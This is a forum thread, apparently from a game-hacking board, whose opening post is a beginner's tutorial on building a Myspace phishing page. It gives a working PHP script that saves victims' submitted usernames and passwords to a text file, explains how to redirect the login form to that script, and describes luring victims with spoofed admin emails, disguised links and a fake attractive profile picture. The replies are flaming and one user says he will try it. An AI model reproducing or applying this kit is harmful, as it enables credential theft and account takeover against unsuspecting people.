Results 1 to 9 of 9
  1. #1
    HazedUp's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    Good Ole' Alabama
    Posts
    3,524
    Reputation
    93
    Thanks
    200
    My Mood
    Tired

    Phishing for Dummies.

    1. Intro
    There are couple of other phishing tutorials around here, but some people seem to have problems understanding them. So I'll try to be as simple as possible. This phishing tutorial is written for newbs, and if you have problems understanding it, then you need to get some beginner level computer knowledge first.

    -This article was written for educational purpose only. I'm not responsible for any illegal activity that you may commit.

    2. What is a phisher?
    Phisher is something that looks like a login page(a fake login page), that writes the username and the password to a file, or does whatever you want.

    3. How to make one?
    All you need is a web hosting service with PHP enabled.
    We will use t35. Go to spam.com and sign up for a free account. In this tutorial we will make a phishing site for Myspace(the procedure is equivalent for most of the sites). While not signed in MYSPACE, open anyone's profile and click on his picture. That will lead you to MYSPACE's login page that has the red box with"You Must Be Logged-In to do That!" just above your login form. Now, click File>Save Page As, and save the MYSPACE page to your Desktop. Open your saved page with any text editor(notepad, wordpad etc.). Select all of the text(the source code), and copy it.
    Get back to your t35 account and click on 'New File' and paste the Myspace's source code there. Name the file 'index.php'(without the ''), and save it.
    Now you have made a page equal to Myspace. Everything on that page will have the same function as if it were on the original site. The link to your phish site will be 'www.xxx.spam.com/index.php' - where 'xxx' is the name of your account.

    But there is a little problem. When someone enters his username and password and press login, it logs him into the real myspace.
    What do we need to change?
    What we need to change is the action of the 'login' button, so instead of logging them into the real site, it writes the username and password to a text file.
    Open your 'index.php' file. Search in the code for keywords 'action='.
    There will be several 'action=some link' in the myspace's source code(for the sign in button, search button, etc.). We need to find the 'action=some link' that refers to the Login button.
    After some searching, we find the:


    Code:
    <h5 class="heading">
                Member Login
            </h5>
            <form action="https://secure.myspace.com/index.cfm?fuseaction=login.process" method="post" id="LoginForm" name="aspnetForm">
    <div>
    <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNTMzMjE3MzI5ZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAgUwY3RsMDAkT ​ WFpbiRTcGxhc2hEaXNwbGF5JGN0bDAwJFJlbWVtYmVyX0NoZWNrYm94BTBjdGwwMCRNYWluJFNwbGFza ​ERpc3BsYXkkY3RsMDAkTG9naW5fSW1hZ2VCdXR0b24=" />
    </div>
    and we know that 'action="https://secure.myspace.com/index.cfm?fuseaction=login.process"' refers to the login button.
    Change:
    action="https://secure.myspace.com/index.cfm?fuseaction=login.process"
    To:
    action="login.php"
    and save the file.

    Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'https://secure.myspace.com/index.cfm?fuseaction=login.process' file.
    Now when you click the login button it will take the values in the username in password boxes, and execute the functions in the 'login.php' file on your site(which doesn't exist yet).
    All we have to do now, is to create a 'login.php' file that contains a function that writes down the username and password into a text document.
    Make another file named 'login.php'(without the quotes) and paste the following code in it:


    Code:
    <?php
    header ('Location: https://myspace.com ');
    $handle = fopen("passwords.txt", "a");
    foreach($_POST as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r\n");
    fclose($handle);
    exit;
    ?>
    The function of login.php is simple. It opens a file named 'passwords.txt'(and creates it if it doesn't already exist) and enter the informations there(the username and password).
    Congratulations! You have a phisher!Superman
    The link to your phish site is:
    https://xxx.spam.com/index.php -where 'xxx' is your account name.
    The link to your text file is:
    https://xxx.spam.com/passwords.txt
    Or you may access it from your account.

    Note that you can choose whatever names you like for index.php, login.php and passwords.txt. but the .php and .txt must stay the same.

    4. How to trick people to fall for it.
    There are billions of ways how to do it, your creativity is your limit.
    Most common way is to make an email similar to the admin, and sending them some report with a link to log in the site(your phish site). Ofcourse you will mask the link.
    How to mask the link?
    If you're posting it on forums, or anywhere where bb code is enabled, you're doing this:


    Code:
    [url =YourPhishSiteLink] TheOriginalSiteLink[/url]<~~Delete Spaces.
    For example, Google looks like a google, but it leads you to yahoo when you click it.

    If you're making the phisher for myspace, and want to get random ppl to it, you can simply make some hot chick account and put some hot pic that will lead to your phish site when clicked. So when they click the lusty image, they will be led to your phish site telling them they need to log in to see that.


    Code:
    [url = YourPhishSiteLink] [img]link of the image[/img][/url]<~~Once again delete spaces.
    When sending emails see for the option 'hyperlink', and it's self explainable once you see it.
    There are many other ways, and as I said, your creativity is the limit.

    5. Outro
    I hope that this tutorial was helpful and simple enough. It explains how to make a phisher, and how it works. Although is written for Myspace, the procedure is equivalent for almost every other login site(for hotmail is different). After this, it's up to you to explore, experiment and dive in the world of social engineering.


    SOME CREDITS GO TO ME! OTHER CREDITS GO TO CROW MY FRIEND!

    Thank me.

  2. The Following User Says Thank You to HazedUp For This Useful Post:

    kingofharems (10-07-2015)

  3. #2
    GG2GG's Avatar
    Join Date
    Mar 2008
    Gender
    male
    Location
    United Kingdom
    Posts
    3,382
    Reputation
    21
    Thanks
    4,294,967,295
    My Mood
    Blah
    no credit goes to you, dont chat shit -.- and asking for thanks is against mpgh's rules

  4. #3
    Bito's Avatar
    Join Date
    Oct 2008
    Gender
    male
    Location
    Quahog land of Family Guy
    Posts
    202
    Reputation
    10
    Thanks
    67
    My Mood
    Hot
    Thanks for the TUT ill try it out tonight
    [IMG]https://i411.photobucke*****m/albums/pp200/Bitobow/SignatureFromCloud.png[/IMG]

    Signature From Cloud!

    Goal List:
    [x]10 Post
    [x]25 post
    [x]50 post
    [x]100 post
    [_]250 post
    [_]500 post
    [x]Create a basic crop sig
    [_]Create a decent overall sig

  5. #4
    HazedUp's Avatar
    Join Date
    Mar 2009
    Gender
    male
    Location
    Good Ole' Alabama
    Posts
    3,524
    Reputation
    93
    Thanks
    200
    My Mood
    Tired
    Quote Originally Posted by GG2GG View Post
    no credit goes to you, dont chat shit -.- and asking for thanks is against mpgh's rules
    Why don't you just leave, Shut the fuck up, and get the fuck out of my threads.

  6. #5
    -DOG-'s Avatar
    Join Date
    Apr 2009
    Gender
    male
    Location
    SUNNYVALE
    Posts
    352
    Reputation
    10
    Thanks
    9
    My Mood
    Sad
    lol fail!!

    u just copy and pasted ROFL!!


    i know where u got it.. just dont want to advertise...

    or copy and paste this in google

    Formerly, when you click the login button it would take the values in the username and password boxes, and execute the functions in the 'https://secure.myspace.com/index.cfm?fuseaction=login.process' file.

  7. #6
    -DOG-'s Avatar
    Join Date
    Apr 2009
    Gender
    male
    Location
    SUNNYVALE
    Posts
    352
    Reputation
    10
    Thanks
    9
    My Mood
    Sad
    ops tried to edit.. but couldnt

  8. #7
    radnomguywfq3's Avatar
    Join Date
    Jan 2007
    Gender
    male
    Location
    J:\E\T\A\M\A\Y.exe
    Posts
    8,858
    Reputation
    381
    Thanks
    1,823
    My Mood
    Sad
    Quote Originally Posted by HazedUp View Post
    Why don't you just leave, Shut the fuck up, and get the fuck out of my threads.

    Mother fucker,, don't flame the mother fucking thread biatch.



    There are two types of tragedies in life. One is not getting what you want, the other is getting it.

    If you wake up at a different time in a different place, could you wake up as a different person?


  9. #8
    Sjoerd's Avatar
    Join Date
    Jan 2008
    Gender
    male
    Location
    Aurora Borealis
    Posts
    16,918
    Reputation
    1272
    Thanks
    2,097
    My Mood
    Hot
    Jetamay stop flaming







  10. #9
    epicdjgo's Avatar
    Join Date
    Dec 2012
    Gender
    male
    Posts
    41
    Reputation
    10
    Thanks
    8
    My Mood
    Amused
    What is a good website for hosting?

Similar Threads

  1. [Detected] Multi Client for DUMMIES
    By Hitman 47 in forum Dragon Nest Hacks & Cheats
    Replies: 137
    Last Post: 03-17-2012, 07:20 AM
  2. Hacking for dummys?
    By one44 in forum Combat Arms Hacks & Cheats
    Replies: 15
    Last Post: 12-27-2008, 07:45 PM
  3. My warrock phishing software source files for cheap
    By HeXel in forum Trade Accounts/Keys/Items
    Replies: 7
    Last Post: 03-30-2008, 08:01 AM
  4. [Source]Visual Basic Phishing Files for warrock (client + server)
    By HeXel in forum Trade Accounts/Keys/Items
    Replies: 9
    Last Post: 03-10-2008, 05:41 AM
  5. Free Phishing For all!
    By noobi4life in forum WarRock - International Hacks
    Replies: 1
    Last Post: 12-16-2007, 01:11 PM

Tags for this Thread